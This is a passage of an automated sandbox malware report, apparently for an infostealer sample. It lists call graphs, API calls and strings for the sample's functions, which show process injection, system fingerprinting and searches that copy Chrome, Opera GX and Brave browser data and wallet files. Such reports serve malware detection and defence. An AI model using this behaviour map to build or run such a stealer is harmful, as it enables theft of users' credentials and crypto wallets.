4116ad 75160->75161 75162 41173c 75160->75162 75164 4104e7 lstrcpyA 75161->75164 75163 4104e7 lstrcpyA 75162->75163 75165 411748 75163->75165 75166 4116c0 _memset 75164->75166 75167 41d016 __setmbcp_nolock 5 API calls 75165->75167 75177 4123d5 lstrcpyA malloc strncpy 75166->75177 75168 411755 75167->75168 75168->73945 75170 4116ea lstrcatA 75178 402920 75170->75178 75172 411707 lstrcatA 75173 411724 75172->75173 75174 4104e7 lstrcpyA 75173->75174 75175 411732 75174->75175 75175->75165 75176->73948 75177->75170 75179 402924 75178->75179 75179->75172 75181 404ac4 75180->75181 75181->75181 75182 404acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlenA InternetCrackUrlA 75181->75182 75183 404b27 75182->75183 75183->73957 75185 40663e lstrlenA lstrlenA 75184->75185 75185->74263 75187 40806a LocalAlloc 75186->75187 75188 406724 75186->75188 75187->75188 75189 40807a CryptStringToBinaryA 75187->75189 75188->74125 75188->74137 75189->75188 75190 408091 LocalFree 75189->75190 75190->75188 75192 41d016 __setmbcp_nolock 5 API calls 75191->75192 75193 410d2c 75192->75193 75193->74317 75353 423c10 75194->75353 75197 411651 RegCloseKey CharToOemA 75199 41d016 __setmbcp_nolock 5 API calls 75197->75199 75198 411630 RegQueryValueExA 75198->75197 75200 411682 75199->75200 75200->74331 75202 412294 75201->75202 75203 412278 K32GetModuleFileNameExA CloseHandle 75201->75203 75204 4104e7 lstrcpyA 75202->75204 75203->75202 75205 4122a0 75204->75205 75206 41d016 __setmbcp_nolock 5 API calls 75205->75206 75207 4122ae 75206->75207 75207->74374 75355 410c16 75208->75355 75211 410b63 RegOpenKeyExA 75213 410b83 RegQueryValueExA 75211->75213 75214 410b9b RegCloseKey 75211->75214 75212 410b5c 75212->74396 75213->75214 75214->75212 75362 42f109 75215->75362 75217 411813 CoInitializeEx CoInitializeSecurity CoCreateInstance 75218 41186b 75217->75218 75219 411873 CoSetProxyBlanket 75218->75219 75222 411964 75218->75222 75225 4118a3 75219->75225 75220 4104e7 lstrcpyA 75221 41198f 75220->75221 75223 42f165 5 API calls 75221->75223 75222->75220 75224 411996 75223->75224 75224->74410 75225->75222 75226 4118d7 VariantInit 75225->75226 75227 4118f6 75226->75227 75363 411757 75227->75363 75229 411901 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 75230 4104e7 lstrcpyA 75229->75230 75231 411958 VariantClear 75230->75231 75231->75221 75372 42f09d 75232->75372 75234 4119a3 CoInitializeEx CoInitializeSecurity CoCreateInstance 75235 4119f9 75234->75235 75236 411a01 CoSetProxyBlanket 75235->75236 75239 411a93 75235->75239 75240 411a31 75236->75240 75237 4104e7 lstrcpyA 75238 411abe 75237->75238 75238->74423 75239->75237 75240->75239 75241 411a59 VariantInit 75240->75241 75242 411a78 75241->75242 75373 411d42 LocalAlloc CharToOemW 75242->75373 75244 411a80 75245 4104e7 lstrcpyA 75244->75245 75246 411a87 VariantClear 75245->75246 75246->75238 75247->74451 75249 4104e7 lstrcpyA 75248->75249 75250 4115cd 75249->75250 75250->74466 75252 4104e7 lstrcpyA 75251->75252 75253 410e02 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 75252->75253 75261 410e3c 75253->75261 75262 410eed 75253->75262 75254 410e42 GetLocaleInfoA 75254->75261 75255 410f05 75257 41d016 __setmbcp_nolock 5 API calls 75255->75257 75256 410ef9 LocalFree 75256->75255 75259 410f15 75257->75259 75258 410609 lstrlenA lstrcpyA lstrcatA 75258->75261 75259->74480 75260 41058d lstrcpyA 75260->75261 75261->75254 75261->75258 75261->75260 75261->75262 75262->75255 75262->75256 75264 410d86 75263->75264 75265 410d6a wsprintfA 75263->75265 75266 41d016 __setmbcp_nolock 5 API calls 75264->75266 75265->75264 75267 410d93 75266->75267 75267->74508 75269 410f94 RegQueryValueExA 75268->75269 75270 410fac RegCloseKey 75268->75270 75269->75270 75270->74525 75272 41107c GetLogicalProcessorInformationEx 75271->75272 75273 411087 75272->75273 75274 411048 GetLastError 75272->75274 75376 411b5b GetProcessHeap HeapFree 75273->75376 75275 4110f3 75274->75275 75276 411057 75274->75276 75278 4110fd 75275->75278 75377 411b5b GetProcessHeap HeapFree 75275->75377 75286 41105b 75276->75286 75283 41d016 __setmbcp_nolock 5 API calls 75278->75283 75279 4110c0 75279->75278 75284 4110c9 wsprintfA 75279->75284 75285 411117 75283->75285 75284->75278 75285->74540 75286->75272 75287 4110ec 75286->75287 75374 411b5b GetProcessHeap HeapFree 75286->75374 75375 411b78 GetProcessHeap HeapAlloc 75286->75375 75287->75278 75289 41d016 __setmbcp_nolock 5 API calls 75288->75289 75290 411005 75289->75290 75290->74554 75378 411b26 75291->75378 75294 41115f wsprintfA 75296 41d016 __setmbcp_nolock 5 API calls 75294->75296 75297 411190 75296->75297 75297->74568 75299 4104e7 lstrcpyA 75298->75299 75304 4111b3 75299->75304 75300 4111df EnumDisplayDevicesA 75301 4111f3 75300->75301 75300->75304 75303 41d016 __setmbcp_nolock 5 API calls 75301->75303 75302 410549 2 API calls 75302->75304 75305 411201 75303->75305 75304->75300 75304->75301 75304->75302 75305->74582 75307 4104e7 lstrcpyA 75306->75307 75308 4114c6 CreateToolhelp32Snapshot Process32First 75307->75308 75309 41154c CloseHandle 75308->75309 75314 4114ee 75308->75314 75310 41d016 __setmbcp_nolock 5 API calls 75309->75310 75312 411561 75310->75312 75311 41153a Process32Next 75311->75309 75311->75314 75312->74596 75313 410609 lstrlenA lstrcpyA lstrcatA 75313->75314 75314->75311 75314->75313 75315 41058d lstrcpyA 75314->75315 75315->75314 75317 4104e7 lstrcpyA 75316->75317 75318 41123b RegOpenKeyExA 75317->75318 75319 411478 75318->75319 75332 411281 75318->75332 75321 410519 lstrcpyA 75319->75321 75320 411287 RegEnumKeyExA 75322 4112c4 wsprintfA RegOpenKeyExA 75320->75322 75320->75332 75323 411489 75321->75323 75325 411460 RegCloseKey 75322->75325 75326 41130a RegQueryValueExA 75322->75326 75330 41d016 __setmbcp_nolock 5 API calls 75323->75330 75324 41145e 75327 41146c RegCloseKey 75324->75327 75325->75327 75328 411440 RegCloseKey 75326->75328 75329 411340 lstrlenA 75326->75329 75327->75319 75328->75332 75329->75328 75329->75332 75331 4114a3 75330->75331 75331->74610 75332->75320 75332->75324 75332->75328 75333 41058d lstrcpyA 75332->75333 75334 4113b0 RegQueryValueExA 75332->75334 75335 410609 lstrlenA lstrcpyA lstrcatA 75332->75335 75333->75332 75334->75328 75334->75332 75335->75332 75337 416ea7 75336->75337 75338 41058d lstrcpyA 75337->75338 75339 416ec4 75338->75339 75340 41058d lstrcpyA 75339->75340 75341 416ee0 75340->75341 75342 41058d lstrcpyA 75341->75342 75343 416eeb 75342->75343 75344 41058d lstrcpyA 75343->75344 75354 41160c RegOpenKeyExA 75353->75354 75354->75197 75354->75198 75358 410ba9 GetProcessHeap HeapAlloc RegOpenKeyExA 75355->75358 75357 410b58 75357->75211 75357->75212 75359 410c03 RegCloseKey 75358->75359 75360 410bec RegQueryValueExA 75358->75360 75361 410c13 75359->75361 75360->75359 75361->75357 75362->75217 75371 42f09d 75363->75371 75365 411763 CoCreateInstance 75366 41178b SysAllocString 75365->75366 75367 4117e7 75365->75367 75366->75367 75369 41179a 75366->75369 75367->75229 75368 4117e0 SysFreeString 75368->75367 75369->75368 75370 4117be _wtoi64 SysFreeString 75369->75370 75370->75368 75371->75365 75372->75234 75373->75244 75374->75286 75375->75286 75376->75279 75377->75278 75379 41114d GlobalMemoryStatusEx 75378->75379 75379->75294

                                                                                                                            Executed Functions

                                                                                                                            Function 00418950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                            • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                            • API String ID: 2238633743-2740034357
                                                                                                                            • Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                            • Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
                                                                                                                            • Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                            • Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19
                                                                                                                            Function 00414CC8 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297filestringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 818 414cc8-414d6f call 42e390 wsprintfA FindFirstFileA call 423c10 * 2 825 414d75-414d89 StrCmpCA 818->825 826 41512b-415141 call 401cde call 41d016 818->826 827 4150f8-41510d FindNextFileA 825->827 828 414d8f-414da3 StrCmpCA 825->828 830 41511f-415125 FindClose 827->830 831 41510f-415111 827->831 828->827 832 414da9-414deb wsprintfA StrCmpCA 828->832 830->826 831->825 834 414e0a-414e1c wsprintfA 832->834 835 414ded-414e08 wsprintfA 832->835 837 414e1f-414e5c call 423c10 lstrcatA 834->837 835->837 841 414e82-414e89 strtok_s 837->841 842 414e8b-414ec9 call 423c10 lstrcatA strtok_s 841->842 843 414e5e-414e6f 841->843 848 415089-41508d 842->848 849 414ecf-414edf PathMatchSpecA 842->849 847 414e75-414e81 843->847 843->848 847->841 848->827 852 41508f-415095 848->852 850 414ee5-414fbe call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 DeleteFileA CopyFileA call 412166 call 42efc0 849->850 851 414fd9-414fee strtok_s 849->851 888 414fc0-414fd4 DeleteFileA call 402920 850->888 889 414ff9-415005 850->889 851->849 854 414ff4 851->854 852->830 855 41509b-4150a9 852->855 854->848 855->827 857 4150ab-4150ed call 401cfd call 414cc8 855->857 864 4150f2 857->864 864->827 888->851 891 415116-41511d call 402920 889->891 892 41500b-415031 call 410519 call 407fac 889->892 891->826 900 415033-415077 call 401cfd call 4104e7 call 416e97 call 402920 892->900 901 41507d-415084 call 402920 892->901 900->901 901->848
                                                                                                                            APIs
                                                                                                                            • wsprintfA.USER32 ref: 00414D1C
                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                            • _memset.LIBCMT ref: 00414D4F
                                                                                                                            • _memset.LIBCMT ref: 00414D60
                                                                                                                            • StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                            • StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                            • wsprintfA.USER32 ref: 00414DC2
                                                                                                                            • StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                            • wsprintfA.USER32 ref: 00414DFF
                                                                                                                            • wsprintfA.USER32 ref: 00414E16
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • _memset.LIBCMT ref: 00414E28
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                            • strtok_s.MSVCRT ref: 00414E82
                                                                                                                            • _memset.LIBCMT ref: 00414E94
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00414EA9
                                                                                                                            • strtok_s.MSVCRT ref: 00414EC2
                                                                                                                            • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
                                                                                                                            • DeleteFileA.KERNEL32(?,00436A28,0043661D), ref: 00414F90
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00414FA0
                                                                                                                              • Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
                                                                                                                            • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00414FC1
                                                                                                                            • strtok_s.MSVCRT ref: 00414FE7
                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 00415105
                                                                                                                            • FindClose.KERNEL32(?), ref: 00415125
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                            • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                            • API String ID: 956187361-332874205
                                                                                                                            • Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                            • Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
                                                                                                                            • Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                            • Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55
                                                                                                                            Function 00409D1C Relevance: 44.4, APIs: 20, Strings: 5, Instructions: 610fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1437 409d1c-409dd5 call 4104e7 call 4105c7 call 410609 call 41058d call 402920 * 2 call 4104e7 * 2 FindFirstFileA 1454 40a788-40a7d7 call 402920 * 3 call 401cde call 402920 * 3 call 41d016 1437->1454 1455 409ddb-409def StrCmpCA 1437->1455 1457 40a761-40a776 FindNextFileA 1455->1457 1458 409df5-409e09 StrCmpCA 1455->1458 1457->1455 1459 40a77c-40a782 FindClose 1457->1459 1458->1457 1461 409e0f-409e85 call 410549 call 4105c7 call 410609 * 2 call 41058d call 402920 * 3 1458->1461 1459->1454 1492 409e8b-409ea1 StrCmpCA 1461->1492 1493 409f8e-40a002 call 410609 * 4 call 41058d call 402920 * 3 1461->1493 1494 409ea3-409f13 call 410609 * 4 call 41058d call 402920 * 3 1492->1494 1495 409f18-409f8c call 410609 * 4 call 41058d call 402920 * 3 1492->1495 1544 40a008-40a01d call 402920 StrCmpCA 1493->1544 1494->1544 1495->1544 1547 40a023-40a037 StrCmpCA 1544->1547 1548 40a1ef-40a204 StrCmpCA 1544->1548 1547->1548 1549 40a03d-40a173 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA call 4104e7 call 410609 * 2 call 41058d call 402920 * 2 call 410519 call 407fac 1547->1549 1550 40a206-40a249 call 401cfd call 410519 * 3 call 40852e 1548->1550 1551 40a259-40a26e StrCmpCA 1548->1551 1735 40a175-40a1b3 call 401cfd call 410519 call 416e97 call 402920 1549->1735 1736 40a1b8-40a1ea DeleteFileA call 402920 * 3 1549->1736 1610 40a24e-40a254 1550->1610 1553 40a270-40a281 StrCmpCA 1551->1553 1554 40a2cf-40a2e9 call 410519 call 411d92 1551->1554 1558 40a6d0-40a6d7 1553->1558 1559 40a287-40a28b 1553->1559 1581 40a2eb-40a2ef 1554->1581 1582 40a34f-40a364 StrCmpCA 1554->1582 1562 40a731-40a75b call 402920 * 2 1558->1562 1563 40a6d9-40a726 call 401cfd call 410519 * 2 call 4104e7 call 409d1c 1558->1563 1559->1558 1565 40a291-40a2cd call 401cfd call 410519 * 2 1559->1565 1562->1457 1632 40a72b 1563->1632 1608 40a335-40a33f call 410519 call 40884c 1565->1608 1581->1558 1590 40a2f5-40a32f call 401cfd call 410519 call 4104e7 1581->1590 1587 40a546-40a55b StrCmpCA 1582->1587 1588 40a36a-40a426 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA 1582->1588 1587->1558 1594 40a561-40a61d call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA 1587->1594 1690 40a4b9-40a4c9 StrCmpCA 1588->1690 1691 40a42c-40a4b3 call 401cfd call 410519 * 3 call 408ddb call 401cfd call 410519 * 3 call 409549 1588->1691 1590->1608 1695 40a623-40a69e call 401cfd call 410519 * 3 call 409072 call 401cfd call 410519 * 3 call 4092a7 1594->1695 1696 40a6a4-40a6b6 DeleteFileA call 402920 1594->1696 1633 40a344-40a34a 1608->1633 1610->1558 1632->1562 1633->1558 1692 40a4cb-40a516 call 401cfd call 410519 * 3 call 409a0e 1690->1692 1693 40a51c-40a52e DeleteFileA call 402920 1690->1693 1691->1690 1692->1693 1708 40a533-40a541 1693->1708 1695->1696 1704 40a6bb-40a6c2 1696->1704 1710 40a6c9-40a6cb call 402920 1704->1710 1708->1710 1710->1558 1735->1736 1736->1548
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
                                                                                                                            • StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
                                                                                                                            • StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01
                                                                                                                              • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                              • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
                                                                                                                            • StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
                                                                                                                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A0EF
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040A1BE
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A1FC
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A266
                                                                                                                            • StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A35C
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A41C
                                                                                                                            • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040A522
                                                                                                                              • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
                                                                                                                              • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF
                                                                                                                              • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
                                                                                                                              • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A553
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A613
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040A6AA
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 0040A76E
                                                                                                                            • FindClose.KERNEL32(?), ref: 0040A782
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                            • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                            • API String ID: 4173076446-1189830961
                                                                                                                            • Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                            • Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
                                                                                                                            • Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                            • Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89
                                                                                                                            Function 6CC235A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2217 6cc235a0-6cc235be 2218 6cc235c4-6cc235ed InitializeCriticalSectionAndSpinCount getenv 2217->2218 2219 6cc238e9-6cc238fb call 6cc5b320 2217->2219 2221 6cc235f3-6cc235f5 2218->2221 2222 6cc238fc-6cc2390c strcmp 2218->2222 2225 6cc235f8-6cc23614 QueryPerformanceFrequency 2221->2225 2222->2221 2224 6cc23912-6cc23922 strcmp 2222->2224 2226 6cc23924-6cc23932 2224->2226 2227 6cc2398a-6cc2398c 2224->2227 2228 6cc2361a-6cc2361c 2225->2228 2229 6cc2374f-6cc23756 2225->2229 2232 6cc23622-6cc2364a _strnicmp 2226->2232 2233 6cc23938 2226->2233 2227->2225 2228->2232 2234 6cc2393d 2228->2234 2230 6cc2396e-6cc23982 2229->2230 2231 6cc2375c-6cc23768 2229->2231 2230->2227 2235 6cc2376a-6cc237a1 QueryPerformanceCounter EnterCriticalSection 2231->2235 2236 6cc23650-6cc2365e 2232->2236 2237 6cc23944-6cc23957 _strnicmp 2232->2237 2233->2229 2234->2237 2238 6cc237b3-6cc237eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2235->2238 2239 6cc237a3-6cc237b1 2235->2239 2240 6cc2395d-6cc2395f 2236->2240 2241 6cc23664-6cc236a9 GetSystemTimeAdjustment 2236->2241 2237->2236 2237->2240 2242 6cc237fc-6cc23839 LeaveCriticalSection 2238->2242 2243 6cc237ed-6cc237fa 2238->2243 2239->2238 2244 6cc23964 2241->2244 2245 6cc236af-6cc23749 call 6cc5c110 2241->2245 2246 6cc23846-6cc238ac call 6cc5c110 2242->2246 2247 6cc2383b-6cc23840 2242->2247 2243->2242 2244->2230 2245->2229 2252 6cc238b2-6cc238ca 2246->2252 2247->2235 2247->2246 2253 6cc238cc-6cc238db 2252->2253 2254 6cc238dd-6cc238e3 2252->2254 2253->2252 2253->2254 2254->2219
                                                                                                                            APIs
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCAF688,00001000), ref: 6CC235D5
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC235E0
                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 6CC235FD
                                                                                                                            • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC2363F
                                                                                                                            • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC2369F
